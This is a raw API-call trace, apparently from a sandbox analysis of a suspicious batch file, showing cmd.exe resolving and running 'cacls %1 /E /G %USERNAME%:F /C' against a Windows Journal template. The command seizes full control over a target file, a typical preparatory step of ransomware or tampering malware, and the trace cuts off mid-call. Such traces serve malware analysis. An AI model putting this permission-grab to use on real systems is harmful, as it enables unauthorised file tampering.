GetUserDefaultLCID () returned 0x409 [0220.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0220.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x92fb88, cchData=128 | out: lpLCData="0") returned 2 [0220.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x92fb88, cchData=128 | out: lpLCData="0") returned 2 [0220.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x92fb88, cchData=128 | out: lpLCData="1") returned 2 [0220.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0220.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0220.418] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0220.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0220.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0220.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0220.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0220.419] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0220.419] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0220.419] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0220.419] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0220.419] GetConsoleTitleW (in: lpConsoleTitle=0xaaa9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.422] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0220.422] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0220.422] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0220.422] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0220.423] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0220.423] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0220.423] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0220.423] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0220.423] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0220.423] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0220.423] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0220.424] GetConsoleTitleW (in: lpConsoleTitle=0x92f870, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.425] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0220.425] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0220.425] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0220.425] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0220.425] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0220.425] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0220.425] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0220.425] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0220.425] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0220.425] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0220.425] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0220.425] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0220.425] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0220.425] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0220.425] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0220.425] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0220.425] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0220.425] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0220.425] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0220.425] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0220.425] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0220.425] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0220.425] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0220.425] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0220.425] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0220.425] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0220.425] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0220.425] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0220.425] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0220.425] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0220.425] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0220.425] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0220.425] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0220.425] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0220.425] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0220.425] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0220.425] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0220.425] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0220.425] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0220.425] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0220.426] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0220.426] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0220.426] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0220.426] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0220.426] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0220.426] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0220.426] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0220.426] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0220.426] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0220.426] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0220.426] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0220.426] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0220.426] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0220.426] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0220.426] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0220.426] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0220.426] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0220.426] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0220.426] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0220.426] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0220.426] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0220.426] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0220.426] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0220.426] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0220.426] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0220.426] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0220.426] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0220.426] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0220.426] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0220.426] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0220.426] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0220.426] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0220.426] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0220.426] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0220.426] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0220.426] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0220.426] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0220.426] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0220.426] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0220.426] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0220.426] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0220.426] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0220.426] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0220.426] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0220.426] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0220.426] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0220.426] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0220.426] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0220.427] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0220.427] SetErrorMode (uMode=0x0) returned 0x0 [0220.427] SetErrorMode (uMode=0x1) returned 0x0 [0220.427] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0xaa05d0, lpFilePart=0x92f37c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x92f37c*="Desktop") returned 0x1d [0220.427] SetErrorMode (uMode=0x0) returned 0x1 [0220.427] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0220.427] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.430] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.430] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0x92f128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f128) returned 0xaab148 [0220.430] FindClose (in: hFindFile=0xaab148 | out: hFindFile=0xaab148) returned 1 [0220.430] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0220.430] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0220.430] GetConsoleTitleW (in: lpConsoleTitle=0x92f5fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.431] ApiSetQueryApiSetPresence () returned 0x0 [0220.431] ResolveDelayLoadedAPI () returned 0x745414a0 [0220.432] SaferWorker () returned 0x0 [0220.444] SetErrorMode (uMode=0x0) returned 0x0 [0220.444] SetErrorMode (uMode=0x1) returned 0x0 [0220.444] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0xaaad28, lpFilePart=0x92f4ac | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0x92f4ac*="vRnqNMBW.bat") returned 0x2a [0220.444] SetErrorMode (uMode=0x0) returned 0x1 [0220.444] wcsspn (_String=" \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\"", _Control=" \x09") returned 0x1 [0220.444] CmdBatNotificationStub () returned 0x1 [0220.445] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x92f53c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0220.445] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0220.445] _get_osfhandle (_FileHandle=3) returned 0xb4 [0220.445] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.445] _get_osfhandle (_FileHandle=3) returned 0xb4 [0220.445] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0220.445] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x92f50c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0x92f50c*=0xe2, lpOverlapped=0x0) returned 1 [0220.445] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0220.445] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0220.446] _get_osfhandle (_FileHandle=3) returned 0xb4 [0220.446] GetFileType (hFile=0xb4) returned 0x1 [0220.446] _get_osfhandle (_FileHandle=3) returned 0xb4 [0220.446] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0220.446] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0220.446] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0220.446] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0220.446] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0220.446] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0220.446] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0220.446] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0220.446] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0220.448] _tell (_FileHandle=3) returned 32 [0220.448] _close (_FileHandle=3) returned 0 [0220.448] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f2d0 | out: _Buffer="\r\n") returned 2 [0220.448] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.448] GetFileType (hFile=0x3c) returned 0x2 [0220.448] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.448] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2a8 | out: lpMode=0x92f2a8) returned 1 [0220.452] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.452] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f2c0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f2c0*=0x2) returned 1 [0220.452] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0220.452] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0220.452] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x92f2cc | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0220.452] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0x92f2cc | out: _Buffer=">") returned 1 [0220.452] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.452] GetFileType (hFile=0x3c) returned 0x2 [0220.452] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.452] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f2ac | out: lpMode=0x92f2ac) returned 1 [0220.452] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.452] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x92f2c4, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0x92f2c4*=0x1e) returned 1 [0220.453] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.453] GetFileType (hFile=0x3c) returned 0x2 [0220.453] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.453] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f54c | out: lpMode=0x92f54c) returned 1 [0220.453] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.453] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xaa7878*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x92f564, lpReserved=0x0 | out: lpBuffer=0xaa7878*, lpNumberOfCharsWritten=0x92f564*=0x5) returned 1 [0220.453] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x92f56c | out: _Buffer=" \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\" /E /G CIiHmnxMn6Ps:F /C ") returned 82 [0220.453] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.453] GetFileType (hFile=0x3c) returned 0x2 [0220.453] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.453] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f544 | out: lpMode=0x92f544) returned 1 [0220.454] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.454] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x52, lpNumberOfCharsWritten=0x92f55c, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f55c*=0x52) returned 1 [0220.454] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x92f580 | out: _Buffer="\r\n") returned 2 [0220.454] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.454] GetFileType (hFile=0x3c) returned 0x2 [0220.454] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0220.454] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x92f558 | out: lpMode=0x92f558) returned 1 [0220.454] _get_osfhandle (_FileHandle=1) returned 0x3c [0220.454] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x92f570, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0x92f570*=0x2) returned 1 [0220.454] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0220.454] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0220.454] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0220.454] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0220.454] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0220.455] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0220.455] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0220.455] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0220.455] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0220.455] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0220.455] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0220.455] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0220.455] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0220.455] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0220.455] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0220.455] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0220.455] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0220.455] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0220.455] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0220.455] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0220.455] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0220.455] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0220.455] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0220.455] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0220.455] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0220.455] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0220.455] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0220.455] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0220.455] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0220.455] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0220.455] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0220.455] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0220.455] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0220.455] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0220.455] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0220.455] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0220.455] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0220.455] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0220.455] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0220.455] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0220.455] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0220.455] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0220.455] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0220.455] SetErrorMode (uMode=0x0) returned 0x0 [0220.455] SetErrorMode (uMode=0x1) returned 0x0 [0220.456] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xaabe98, lpFilePart=0x92f31c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x92f31c*="Desktop") returned 0x1d [0220.456] SetErrorMode (uMode=0x0) returned 0x1 [0220.456] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0220.456] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0220.457] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0220.457] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.457] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xffffffff [0220.457] GetLastError () returned 0x2 [0220.457] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.457] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xffffffff [0220.458] GetLastError () returned 0x2 [0220.458] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0220.458] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xaa0b68 [0220.458] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0220.458] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xffffffff [0220.458] GetLastError () returned 0x2 [0220.458] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x92f0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x92f0a8) returned 0xaa0b68 [0220.458] FindClose (in: hFindFile=0xaa0b68 | out: hFindFile=0xaa0b68) returned 1 [0220.458] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0220.458] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0220.458] GetConsoleTitleW (in: lpConsoleTitle=0x92f0f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0220.459] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0220.459] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0220.459] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0220.459] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0220.459] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0220.460] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0220.460] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0220.460] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0220.460] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0220.460] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0220.460] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0220.460] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0220.460] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0220.460] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0220.460] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0220.460] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0220.460] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0220.460] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0220.460] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0220.460] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0220.460] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0220.460] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0220.460] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0220.460] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0220.460] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0220.460] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0220.460] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0220.460] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0220.460] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0220.460] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0220.460] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0220.460] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0220.460] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0220.460] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0220.460] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0220.460] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0220.460] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0220.460] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0220.460] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0220.460] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0220.460] _wcsicmp (_String1="cacls", 